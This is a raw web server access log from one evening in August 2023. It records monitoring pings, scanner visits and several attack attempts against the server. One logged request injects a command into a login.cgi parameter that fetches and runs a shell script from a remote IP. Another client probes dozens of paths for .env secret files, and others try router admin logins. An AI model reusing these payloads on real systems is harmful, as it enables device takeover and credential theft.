198.235.24.67 - - [06/Aug/2023:21:58:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [06/Aug/2023:21:59:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:00:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:01:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:02:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
211.46.18.1 - - [06/Aug/2023:22:03:49 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [06/Aug/2023:22:03:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:04:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:05:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:06:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:07:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:08:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.128.232.84 - - [06/Aug/2023:22:08:54 +0200] "CONNECT www.twitch.tv:443 HTTP/1.1" 405 343 "-" "-"
37.139.129.139 - - [06/Aug/2023:22:09:01 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.139.129.139 - - [06/Aug/2023:22:09:01 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [06/Aug/2023:22:09:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:10:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.126 - - [06/Aug/2023:22:11:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.126 - - [06/Aug/2023:22:11:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.126 - - [06/Aug/2023:22:11:35 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.126 - - [06/Aug/2023:22:11:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [06/Aug/2023:22:11:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:12:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.42.87.165 - - [06/Aug/2023:22:13:51 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:22:13:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:14:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:15:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:16:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:17:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:18:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:19:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:20:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:21:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:22:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:23:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.44.42.25 - - [06/Aug/2023:22:24:35 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:22:24:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.201.2.2 - - [06/Aug/2023:22:25:05 +0200] "POST /login.cgi HTTP/1.1" 404 314 "http://212.91.246.80:80/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
84.201.2.2 - - [06/Aug/2023:22:25:45 +0200] "POST /login.cgi HTTP/1.1" 404 314 "http://212.91.246.80:80/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
84.201.2.2 - - [06/Aug/2023:22:25:46 +0200] "POST /login.cgi HTTP/1.1" 404 314 "http://212.91.246.80:80/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
212.91.246.72 - - [06/Aug/2023:22:25:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
206.189.206.127 - - [06/Aug/2023:22:26:04 +0200] "GET / HTTP/1.1" 200 1229 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:04 +0200] "GET /.env HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:04 +0200] "GET /.remote HTTP/1.1" 404 312 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:04 +0200] "GET /.local HTTP/1.1" 404 311 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:04 +0200] "GET /.production HTTP/1.1" 404 316 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:04 +0200] "GET /vendor/.env HTTP/1.1" 404 316 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:04 +0200] "GET /lib/.env HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:05 +0200] "GET /lab/.env HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:05 +0200] "GET /cronlab/.env HTTP/1.1" 404 317 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:05 +0200] "GET /cron/.env HTTP/1.1" 404 314 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:05 +0200] "GET /core/.env HTTP/1.1" 404 314 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:05 +0200] "GET /core/app/.env HTTP/1.1" 404 318 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:05 +0200] "GET /core/Datavase/.env HTTP/1.1" 404 323 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:05 +0200] "GET /database/.env HTTP/1.1" 404 318 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:05 +0200] "GET /config/.env HTTP/1.1" 404 316 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:05 +0200] "GET /assets/.env HTTP/1.1" 404 316 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:06 +0200] "GET /app/.env HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:06 +0200] "GET /apps/.env HTTP/1.1" 404 314 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:06 +0200] "GET /uploads/.env HTTP/1.1" 404 317 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:06 +0200] "GET /sitemaps/.env HTTP/1.1" 404 318 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:06 +0200] "GET /saas/.env HTTP/1.1" 404 314 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:06 +0200] "GET /api/.env HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:06 +0200] "GET /psnlink/.env HTTP/1.1" 404 317 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:06 +0200] "GET /exapi/.env HTTP/1.1" 404 315 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:06 +0200] "GET /site/.env HTTP/1.1" 404 314 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:06 +0200] "GET /admin/.env HTTP/1.1" 404 315 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:07 +0200] "GET /web/.env HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:07 +0200] "GET /public/.env HTTP/1.1" 404 316 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:07 +0200] "GET /en/.env HTTP/1.1" 404 312 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:07 +0200] "GET /tools/.env HTTP/1.1" 404 315 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:07 +0200] "GET /v1/.env HTTP/1.1" 404 312 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:07 +0200] "GET /v2/.env HTTP/1.1" 404 312 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:07 +0200] "GET /administrator/.env HTTP/1.1" 404 323 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:07 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:07 +0200] "GET /cp/.env HTTP/1.1" 404 312 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:07 +0200] "GET /cron/.env HTTP/1.1" 404 314 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:08 +0200] "GET /cronlab/.env HTTP/1.1" 404 317 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:08 +0200] "GET /cryo_project/.env HTTP/1.1" 404 322 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:08 +0200] "GET /css/.env HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:08 +0200] "GET /custom/.env HTTP/1.1" 404 316 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:08 +0200] "GET /d/.env HTTP/1.1" 404 311 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:08 +0200] "GET /data/.env HTTP/1.1" 404 314 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:08 +0200] "GET /deploy/.env HTTP/1.1" 404 316 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:08 +0200] "GET /dev/.env HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:08 +0200] "GET /developer/.env HTTP/1.1" 404 319 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:09 +0200] "GET /developerslv/.env HTTP/1.1" 404 322 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:09 +0200] "GET /development/.env HTTP/1.1" 404 321 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:09 +0200] "GET /directories/.env HTTP/1.1" 404 321 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:09 +0200] "GET /dist/.env HTTP/1.1" 404 314 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:09 +0200] "GET /en/.env HTTP/1.1" 404 312 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:09 +0200] "GET /engine/.env HTTP/1.1" 404 316 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:09 +0200] "GET /env/.env HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:09 +0200] "GET /fhir-api/.env HTTP/1.1" 404 318 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:09 +0200] "GET /files/.env HTTP/1.1" 404 315 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:09 +0200] "GET /fileserver/.env HTTP/1.1" 404 320 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:10 +0200] "GET /html/.env HTTP/1.1" 404 314 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:10 +0200] "GET /http/.env HTTP/1.1" 404 314 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:10 +0200] "GET /httpboot/.env HTTP/1.1" 404 318 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:10 +0200] "GET /tmp/.env HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:10 +0200] "GET /tools/.env HTTP/1.1" 404 315 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:10 +0200] "GET /Travel_form/.env HTTP/1.1" 404 321 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:10 +0200] "GET /ts/prime/.env HTTP/1.1" 404 318 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:10 +0200] "GET /twitter/.env HTTP/1.1" 404 317 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:10 +0200] "GET /ubuntu/.env HTTP/1.1" 404 316 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:10 +0200] "GET /ui/.env HTTP/1.1" 404 312 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:11 +0200] "GET /upfiles/.env HTTP/1.1" 404 317 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:11 +0200] "GET /upload/.env HTTP/1.1" 404 316 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:11 +0200] "GET /uploads/.env HTTP/1.1" 404 317 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:11 +0200] "GET /urlmem-app/.env HTTP/1.1" 404 320 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:11 +0200] "GET /User_info/.env HTTP/1.1" 404 319 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:11 +0200] "GET /usr/share/nginx/html/.env HTTP/1.1" 404 330 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:11 +0200] "GET /var/backup/.env HTTP/1.1" 404 320 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:11 +0200] "GET /vendor/.env HTTP/1.1" 404 316 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:11 +0200] "GET /websocket/.env HTTP/1.1" 404 319 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:12 +0200] "GET /webstatic/.env HTTP/1.1" 404 319 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:12 +0200] "GET /phpinfo HTTP/1.1" 404 312 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
206.189.206.127 - - [06/Aug/2023:22:26:12 +0200] "POST / HTTP/1.1" 200 1229 "https://www.google.com/" "Mozilla/5.0 (Windows NT.6.2; WOW64) Gecko/20030507 Firefox/19.0"
212.91.246.72 - - [06/Aug/2023:22:26:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:27:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:28:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:29:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.136.193.46 - - [06/Aug/2023:22:30:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [06/Aug/2023:22:30:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:31:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:32:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:33:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:34:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:35:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:36:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:37:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:38:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:39:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:40:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:41:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.201.2.2 - - [06/Aug/2023:22:42:21 +0200] "POST /login.cgi HTTP/1.1" 404 314 "http://212.91.246.80:80/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
212.91.246.72 - - [06/Aug/2023:22:42:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.145 - - [06/Aug/2023:22:43:40 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:22:43:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:44:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:45:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:46:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.97.210.59 - - [06/Aug/2023:22:47:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [06/Aug/2023:22:47:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
